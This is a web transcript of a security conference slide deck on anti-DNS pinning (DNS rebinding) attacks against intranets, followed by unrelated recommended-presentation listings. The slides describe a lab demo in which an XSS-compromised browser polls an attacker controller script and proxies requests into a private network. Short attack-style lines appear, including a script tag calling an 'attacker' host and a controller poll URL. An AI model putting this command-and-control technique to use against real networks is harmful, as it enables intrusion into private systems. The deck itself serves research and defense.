intranet invasion through anti dns pinning
play

Intranet Invasion Through Anti-DNS Pinning David Byrne, CISSP, MCSE - PowerPoint PPT Presentation

Aug 09, 2023 •277 likes •874 views

Intranet Invasion Through Anti-DNS Pinning David Byrne, CISSP, MCSE Security Architect EchoStar Satellite / Dish Network David.Byrne@echostar.com Naming Conventions Anti-DNS pinning a.k.a. DNS rebinding a.k.a. Quick-swap DNS Google

  1. Intranet Invasion Through Anti-DNS Pinning David Byrne, CISSP, MCSE Security Architect EchoStar Satellite / Dish Network David.Byrne@echostar.com

  2. Naming Conventions Anti-DNS pinning a.k.a. DNS rebinding a.k.a. Quick-swap DNS • Google results: – “Anti-DNS pinning”: 12,900 – “DNS Rebinding”: 214 – “Quick-swap DNS”: 142 • Anti-DNS pinning is a specialized version of DNS Rebinding

  3. Web / JavaScript Malware • Cross Site Scripting (XSS) • Cross Site Request Forgery (CSRF) • Port scanning • Keystroke capturing • Client-side file enumeration • Web site fingerprinting • Browser history theft • Self-propagating worms

  4. Presentation Objectives • Explain simple DNS-rebinding attacks, and why DNS- pinning was the solution • Demonstrate turning a web browser into an HTTP proxy server using only JavaScript • Demonstrate turning a web browser into a generic SOCKS proxy using only untrusted Java applets • Discuss other DNS-rebinding attacks • Discuss defense against anti-DNS pinning attacks

  5. Same Origin Policy • Netscape started it in Navigator 2 when JavaScript debuted • “ The same origin policy prevents documents or scripts loaded from one origin from getting or setting properties of a document from a different origin. ” – Mozilla.org • Both documents must have the same protocol, the same hostname the and same port; IP address must be ignored because of virtual hosts • Cross Site Scripting gets around this by injecting JavaScript into the targeted site. Without rare client- side vulnerabilities, a properly secured site is not vulnerable

  6. Simple DNS A t t Rebinding Attacks a c k p a y Attack Web Server l o a U d R s e 13.1.2.3 e f q u u l e d s a t t a evil.attacker.com 13.1.2.3 10.4.5.6 Victim browser Attack DNS Server attacker.com Useful data DNS Cache Attack request evil.attacker.com 13.1.2.3 10.4.5.6 Victim Web Server 10.4.5.6

  7. DNS Pinning • Intended to prevent simple DNS rebinding attacks • It forces a browser to pin the first DNS response for a hostname in cache; no additional queries are allowed • The first attack against it was documented in 1996 by Princeton researchers; against Java, not browsers • May violate RFC 2616 (HTTP/1.1)

  8. RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1 15.3 DNS Spoofing … If HTTP clients cache the results of host name lookups in order to achieve a performance improvement, they MUST observe the TTL information reported by DNS. If HTTP clients do not observe this rule, they could be spoofed when a previously-accessed server's IP address changes. As network renumbering is expected to become increasingly common, the possibility of this form of attack will grow. Observing this requirement thus reduces this potential security vulnerability.

  9. Defeating DNS-Pinning – Process Termination • First documented in September, 2003 by Josh Soref • Ignored until July, 2006 when Amit Klein brought it up again 1. Get the victim browser to request an attack payload 2. Wait for the browser to close, or cause it to crash 3. Wait for the user to open the browser again 4. Get the browser to reload the payload from cache 5. The payload initiates a request to the hostname it came from originally 6. The browser re-queries the DNS server, but this time it receives the IP address of the target server 7. The payload is run against the target server

  10. Defeating DNS-Pinning – Process Termination • Pros – Difficult to defeat with browser design; the browser must re-query DNS eventually • Cons – Defeated by clearing the cache on exit – Difficult to get attack payload reloaded from cache – Very, very slow

  11. Defeating DNS-Pinning – Forcing Cache Reloads • In August 2006, Martin Johns documented that major browsers (IE & Firefox) don’t fully implement DNS pinning • If a web server becomes unavailable, the DNS cache is dumped • Coordinating firewall and DNS changes makes for an effective attack

  12. Anti-DNS Pinning: Unavailable Server A t t a c k c o Attack Web Server A d e t t U a R s c e 13.1.2.3 e k f q u r u e l e q d s u a t e t a s t evil.attacker.com 13.1.2.3 10.4.5.6 Victim browser Attack DNS Server attacker.com Useful data DNS Cache Attack request evil.attacker.com 10.4.5.6 13.1.2.3 Victim Web Server 10.4.5.6

  13. Demonstration Components • Victim browser – standard JavaScript only; no plug-ins • Victim web server – typically on a private network • Attack server – Backend MySQL database – Primary IP address • Authoritative DNS server for an attacker-controlled domain • HTTP proxy server that accepts requests from the attacker • Web-based attack console (CGI script) • Responds to polls from victim browsers with new commands and proxy requests (CGI script) • Receives response data from the victim browser (CGI script) – Secondary IP address • Serves up iframe content for anti-DNS pinning attack (CGI script)

  14. JavaScript Malware Communication • All communication must be initiated by the victim browser to the attack server, or to the victim server • Command & control functions are implemented by polling the attacker’s server with scripts • Image requests or forms send data from the victim browser to the controller script • XMLHTTPRequest sends requests from the victim browser to the victim server

  15. Requesting Data from the Attack Server • Primary method uses intentional XSS • A script is loaded from the attack server; <script src="http://attacker/control.pl?command=poll"> • The response stores data in variables that the requesting script can access data['request345'] = 'GET / HTTP/1.0\n…'; • Anti-XSS filters might break this • No XSS is required for the demonstration

  16. Sending Data to the Attack Server • Small amounts of text data: – Create an image object – Set source to the controller script on the attack server; the text data is passed in the query string – Append object to document body • Large amount of data, or binary data – HTML form – Data in text input box – Action set to the controller script on the attack server – Method set to POST – Target set to an unused iframe – Encoding type to “multipart/form-data”

  17. XMLHTTPRequest Object •The XMLHTTPRequest (XHR) object allows JavaScript to issue arbitrary HTTP GETs or POSTs •Used commonly in AJAX sites such as Google Maps •Normally, it can only return text data •Thanks to Marcus Granado (mgran.blogspot.com) for documenting how to retrieve binary data using the “x-user-defined” character set. •Can only be used with the origin server; after the DNS change, the victim server is considered origin

  18. Demonstration Environment Internet Corporate 12.0.0.0/24 10.0.0.0/24 TCP/80,443 Linux Server XSS Infected Server 10.0.0.30 12.0.0.80 HTTP, MySQL HTTP TCP/53,80,443;UDP/53 Attack Server 12.0.0.51, 12.0.0.52 Windows Server HTTP, MySQL, DNS 10.0.0.31 TCP/80,443 DNS,SMB Attack Victim workstation workstation 12.0.0.60 10.0.0.100

  19. Demonstration Environment DD-WRT Firewall Internet Laptop Corporate Laptop Attack server VM Windows server VM Attack workstation VM Linux server VM XSS infected server VM Victim workstation VM With assistance from Eric Duprey

  20. Demonstration Sequence Internet Corporate 12.0.0.0/24 10.0.0.0/24 Victim XSS Infected Attack Server workstation Linux Server Victim Server XSS Infected Server workstation Attack workstation Windows Server http://www.news-site.com/infected_page.asp 1. Victim browser visits a website infected with a XSS attack and runs a small piece of malicious JavaScript code.

  21. Demonstration Sequence Internet Corporate 12.0.0.0/24 10.0.0.0/24 XSS Infected Linux Server Victim Server Attack Server workstation Attack workstation Windows Server http://12.0.0.51/attack.html 2. The malicious JavaScript causes the victim to load a page from the attack web server. This could be in a new window, in a small iframe, etc.

  22. Demonstration Sequence Internet Corporate 12.0.0.0/24 10.0.0.0/24 XSS Infected Linux Server Victim Server Attack Server workstation Attack workstation Windows Server http://12.0.0.51/cgi-bin/controller.pl?command=poll&sessionID=10 3. Every 1.5 seconds, JavaScript from the base attack page appends a <SCRIPT> tag to the document body. The source is set to the controller script, with a command value indicating a poll

  23. Demonstration Sequence Internet Corporate 12.0.0.0/24 10.0.0.0/24 Victim XSS Infected workstation Linux Server Server Attack Server Attack workstation Windows Server INSERT INTO sessions (sessionID, externalIP, lastPoll, firstPoll, proxyState) VALUES (?, ?, ?, ?, ?) 4. On the first poll, the controller script records the session in the database, which allows the attacker to see it in the console

  24. Demonstration Sequence Internet Corporate 12.0.0.0/24 10.0.0.0/24 XSS Infected Linux Server Attack Server Victim Server workstation Attack workstation Windows Server alert('I own you'); 5. The controller script checks for new commands in the attack database. Any commands are sent back to the victim browser as JavaScript statements.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

FFP Unlimited Invasion FFP Unlimited Invasion No Restrictions No Limits WE AR WE ARE E

FFP Unlimited Invasion FFP Unlimited Invasion No Restrictions No Limits WE AR WE ARE E

FFP Unlimited Invasion FFP Unlimited Invasion No Restrictions No Limits WE AR WE ARE E GRA RATE TEFUL FUL AB ABOU OUT T US US Life Insurance is a Financial Planning Tool It provides a source of financial relief for

617 views • 15 slides
The Modern Intranet Knut Relbe-Moe Product Evangelist &amp; Partner Manager, Valo Intranet Valo

The Modern Intranet Knut Relbe-Moe Product Evangelist &amp; Partner Manager, Valo Intranet Valo

The Modern Intranet Knut Relbe-Moe Product Evangelist &amp; Partner Manager, Valo Intranet Valo Xylos TURNOVER EMPLOYEES ESTABLISHED CREDIT CLASS 9M 90 2001 AAA LOCATIONS Helsinki (HQ), Jyvskyl, Oslo, Montreal OWNED BY

783 views • 64 slides
1 2 3 4 5 6 7 In about 1312 A.D, during the Muslim invasion by Malik Kafur, the General of

1 2 3 4 5 6 7 In about 1312 A.D, during the Muslim invasion by Malik Kafur, the General of

1 2 3 4 5 6 7 In about 1312 A.D, during the Muslim invasion by Malik Kafur, the General of Allauddin, Sultan of Delhi and in 1323 A.D during the invasion of Ulugh Khan there was a great commotion. To inspire his fellows, Vedanta Desika

690 views • 15 slides
Affinity-aw are Dynam ic Pinning Scheduling for Virtual Machines Zhi Li lizhi@cse.buaa.edu.cn

Affinity-aw are Dynam ic Pinning Scheduling for Virtual Machines Zhi Li lizhi@cse.buaa.edu.cn

Affinity-aw are Dynam ic Pinning Scheduling for Virtual Machines Zhi Li lizhi@cse.buaa.edu.cn School of Computer Science, BeiHang University, Beijing, China Outline Motivation CPU Affinity-aware Method Dynamic Pinning Scheduling

291 views • 14 slides
Norwegian King Crab Invasion Norwegian King Crab Invasion Giant Crab 'Red Army' Invades Norway

Norwegian King Crab Invasion Norwegian King Crab Invasion Giant Crab 'Red Army' Invades Norway

Norwegian King Crab Invasion Norwegian King Crab Invasion Giant Crab 'Red Army' Invades Norway James Owen for National Geographic News, March 9, 2004 The Cold War might be over, but a red army of monster crustaceansmarshalled by Soviet-era

398 views • 22 slides
A plan was set for Operation Overlord, the Allied invasion of Normandy It included Operation

A plan was set for Operation Overlord, the Allied invasion of Normandy It included Operation

A plan was set for Operation Overlord, the Allied invasion of Normandy It included Operation Neptune, the largest seaborne invasion in history 4,000 ships 11,000 airplanes 150,000 soldiers and all their supplies A date of 5 June 1944 was agreed

561 views • 10 slides
MATA30 Instructor: Dr. Ken Butler 1 Contact information (on Intranet: intranet.utsc.utoronto.ca

MATA30 Instructor: Dr. Ken Butler 1 Contact information (on Intranet: intranet.utsc.utoronto.ca

Welcome to MATA30 Instructor: Dr. Ken Butler 1 Contact information (on Intranet: intranet.utsc.utoronto.ca , My Courses) E-mail: butler@utsc.utoronto.ca Office: B 426 Office hours: to be announced Phone: 5654 (416-287-5654) 2

613 views • 17 slides
1 2 3 https://intranet.birmingham.ac.uk/les/our-staff/index.aspx 4 5

1 2 3 https://intranet.birmingham.ac.uk/les/our-staff/index.aspx 4 5

1 2 3 https://intranet.birmingham.ac.uk/les/our-staff/index.aspx 4 5 https://intranet.birmingham.ac.uk/les/college-services/index.aspx 6 7 www.canvas.bham.ac.uk (for DPA, Information Security and online Health and Safety course)

272 views • 14 slides
Creating the new Junior Doctors intranet page MR SHKO RESOOL VASCULAR SURGERY DEPARTMENT DR

Creating the new Junior Doctors intranet page MR SHKO RESOOL VASCULAR SURGERY DEPARTMENT DR

Creating the new Junior Doctors intranet page MR SHKO RESOOL VASCULAR SURGERY DEPARTMENT DR GUNEET SEMBHI SALLY ORRELL MR STEVE JONES Introduction Wide use of SaTH intranet on daily basis Guidelines, contact details, news etc.

688 views • 22 slides
The Art of CPU-Pinning: Evaluating and Improving the Performance of Virtualization and

The Art of CPU-Pinning: Evaluating and Improving the Performance of Virtualization and

The Art of CPU-Pinning: Evaluating and Improving the Performance of Virtualization and Containerization Platforms Davood GhatrehSamani, Chavit Denninart Joseph Bacik Mohsen Amini Salehi High Performance Cloud Computing Lab (HPCC)

408 views • 30 slides
anti-virus and anti-anti-virus 1 logistics: TRICKY HW assignment out infecting an

anti-virus and anti-anti-virus 1 logistics: TRICKY HW assignment out infecting an

anti-virus and anti-anti-virus 1 logistics: TRICKY HW assignment out infecting an executable 2 anti-virus techniques last time: signature-based detection regular expression-like matching snippets of virus(-like) code heuristic

1.79k views • 139 slides
Pre- Versus Post-operative Perineural Invasion Cartilage invasion Radiotherapy

Pre- Versus Post-operative Perineural Invasion Cartilage invasion Radiotherapy

Dislosures Postoperative Radiation and Clinical trial support from Genentech Inc. Chemoradiation: Indications and Optimization of Practice Sue S. Yom, MD, PhD Associate Professor UCSF Radiation Oncology Clinical Indicators of Increased

447 views • 5 slides
The Bri(sh invasion in the United States had huge

The Bri(sh invasion in the United States had huge

The Bri(sh invasion in the United States had huge successes with the Beatles and The Rolling Stones. This signaled other Bri(sh blues-based

515 views • 36 slides
Computation vs. Memory Systems: Pinning Down Accelerator Bottlenecks Martha Kim and Stephen

Computation vs. Memory Systems: Pinning Down Accelerator Bottlenecks Martha Kim and Stephen

Computation vs. Memory Systems: Pinning Down Accelerator Bottlenecks Martha Kim and Stephen Edwards Columbia University Department of Computer Science June 19, 2010 AMAS-BT Workshop 2 Improved processor performance Fuller- Slower

706 views • 58 slides
Theoretical insights on pinning Ivan Sadovskyy (Argonne, UChicago)

Theoretical insights on pinning Ivan Sadovskyy (Argonne, UChicago)

Theoretical insights on pinning Ivan Sadovskyy (Argonne, UChicago) Andreas Glatz (Argonne, NIU) Alexei Koshelev (Argonne) Gregory Kimmel (Northwestern) TTC Topical Workshop,

444 views • 18 slides
Adaptation and Synchronization over a Network : Asymptotic Error Convergence and Pinning Travis

Adaptation and Synchronization over a Network : Asymptotic Error Convergence and Pinning Travis

Adaptation and Synchronization over a Network : Asymptotic Error Convergence and Pinning Travis E. Gibson teg807@harvard.edu Harvard Medical School 55 th Conference on Decision and Control December 12-14, 2016 Outline Graph Notation,

520 views • 16 slides
First International Resources, LLC 605 Third Avenue, New York, NY 10158 www.adl.org 2 Table of

First International Resources, LLC 605 Third Avenue, New York, NY 10158 www.adl.org 2 Table of

Attitudes Toward Jews in Seven European Countries February 2009 Prepared by: First International Resources, LLC 605 Third Avenue, New York, NY 10158 www.adl.org 2 Table of Contents Methodology 3 Anti-Semitism in Europe 4 Global Financial

554 views • 26 slides
L-S Safety Council Presentation to LSSC 1-7-20 Safety Administration Training/Preparation

L-S Safety Council Presentation to LSSC 1-7-20 Safety Administration Training/Preparation

L-S Safety Council Presentation to LSSC 1-7-20 Safety Administration Training/Preparation Infrastructure Community Outreach Safety Administration Trainings/Preparation ALICE Whole school New paradigm of

136 views • 9 slides
Tobago Chamber of Commerce Trade and Business Development Committee About Us Independent

Tobago Chamber of Commerce Trade and Business Development Committee About Us Independent

Presentation to the Trinidad and Tobago Chamber of Commerce Trade and Business Development Committee About Us Independent Statutory Body established pursuant to the Fair Trading Act Our main purposes are to: ensure that all legitimate

779 views • 16 slides
Fort Wayne Community Schools Middle and High School Anti-Bullying Presentation Adapted from

Fort Wayne Community Schools Middle and High School Anti-Bullying Presentation Adapted from

Fort Wayne Community Schools Middle and High School Anti-Bullying Presentation Adapted from PacerTeens Against Bullying (IC-20-33-8.2 must be presented no later than 10/15 each year) TODAYS GOALS Help students understand: The

440 views • 41 slides
3 Trade Defence Instruments Presentation on Anti Dumping WTO provides for 3 trade defence

3 Trade Defence Instruments Presentation on Anti Dumping WTO provides for 3 trade defence

3 Trade Defence Instruments Presentation on Anti Dumping WTO provides for 3 trade defence and Safeguards Agreement instruments for imposing duties beyond the bound rate Anti-Dumping duty Countervailing duty Shashank Priya

250 views • 10 slides
Title of Presentation Conference or Event Title Unjustice : Overcoming Trumps Rollbacks on

Title of Presentation Conference or Event Title Unjustice : Overcoming Trumps Rollbacks on

Title of Presentation Conference or Event Title Unjustice : Overcoming Trumps Rollbacks on Month Year Youth Justice CCRY Fall Meeting October 2018 Get To Know Your Neighbor What does youth justice mean to you? What is one thing you are

301 views • 18 slides
Finding truth in a Sea of lies Ethan Lindenberger Part 1: Introductions Where was my mom getting

Finding truth in a Sea of lies Ethan Lindenberger Part 1: Introductions Where was my mom getting

Finding truth in a Sea of lies Ethan Lindenberger Part 1: Introductions Where was my mom getting this information? Videos, articles, and post were constantly about vaccines. But with resources such as the CDC, WHO, and scientific studies I

476 views • 32 slides
Read and Wonder: Tarred and Feathered in Toledo Questions to think about: Why were these three

Read and Wonder: Tarred and Feathered in Toledo Questions to think about: Why were these three

Read and Wonder: Tarred and Feathered in Toledo Questions to think about: Why were these three men tarred and feathered? What are the views of the local judge and mayor regarding this incident? What does this article tell you about

70 views • 5 slides

More recommend